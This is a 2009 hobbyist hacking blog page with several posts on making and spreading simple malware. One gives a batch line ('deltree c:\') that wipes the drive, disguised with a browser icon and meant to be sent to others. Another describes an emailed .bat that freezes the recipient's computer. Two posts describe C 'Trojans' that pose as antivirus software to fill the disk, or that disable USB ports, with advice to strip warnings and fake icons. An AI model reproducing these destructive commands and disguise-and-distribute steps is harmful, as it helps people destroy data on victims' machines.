Text Widget

Followers

Archives

Blogger Tutorials

Featured Articles

Technology

All Stories
Showing posts with label Computer hacking. Show all posts
Showing posts with label Computer hacking. Show all posts

Friday, October 2, 2009


Are you interseted doing risky thing in your PC? If yes than here i will tell you some thing that you will be surprised...
Today i will give  you a trick to make your own virus which is very deadly and destroys that whole system.





Follow the clues given below :
1.Open note pad
2.Type " @echo off deltree c:\ " in the notepad. Like this

 3.Then save the file as "virus.bat" like this




4.Then change the icon of that file by opening its property. for example i change it into internet exploror.



5.Now your virus is ready.
 

6.Start sending to other's and have fun.
*Note: Please dont try this in your own PC.
Enjoy :)

rOsH         1 comment:

Thursday, October 1, 2009

Heyy guys today iam going to tell you all about freezing someone's computer by sending them E-mails in which you have to send some file formatted  *.bat.
The file that should be created to send to the others email cand me made by following clues :

1.Go to start and open notepad
2. Type "Start" vertically for more than 50 times.Like this



 3.Then save the file as Name.bat. Here i save it as the name virus.bat.Like this



4.Send it to others Email
5.You are done!. When other will download this file and open that file their computer will be freezed thike this



    rOsH         1 comment:

    Sunday, August 2, 2009

    It is excel file which have been password protected. Solve this integers and the 6th number is the password of the file. Downdoad the file here
    1,2, 6, 42, 1806........?

    Enjoy!!

    Wednesday, July 29, 2009

    1.Minimize every thing and press print screen and insert key on your key board.
    2.Then open paint.
    3.Select some area and go to edit and paste.
    4.You will see your desktop in the paint.
    5.Save as jpeg.
    6.Open that picture and set as desktop background
    7.Then go to desktop and do hide desktop icons
    8.Thats it your dektop is now locked.

    To Unlock
    1.Change your desktop back ground and do show desktop icons.

    Enjoy
    rOsH         3 comments:
    Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…



    Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

    Now lets move to the working of our Trojan

    The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.



    The algorithm of the Trojan is as follows

    1. Search for the root drive

    2. Navigate to WindowsSystem32 on the root drive

    3. Create the file named “spceshot.dll”

    4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

    5. Once the drive is full, stop the process.

    You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.


    How to compile, test and remove the damage?

    Compilation:
    For step-by-step compilation guide, refer my post How to compile C Programs.



    Testing:
    To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.



    NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.


    NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?

    Note : Dont try this in your PC
    Gohacking
    rOsH         5 comments:

    In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

    Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

    1. Download the USB_Block.rar file on to your computer.


    2. It contains the following 4 files.


    block_usb.c (source code)

    unblock_usb.c (source code)

    3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.

    3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

    4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

    5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).



    I hope you like this post. Please pass your comments.
    Credits to: GoHacks

    Recent news

    Labels

    Text Widget

    PocketCents Local Online Advertising

    Blogroll

    Discussion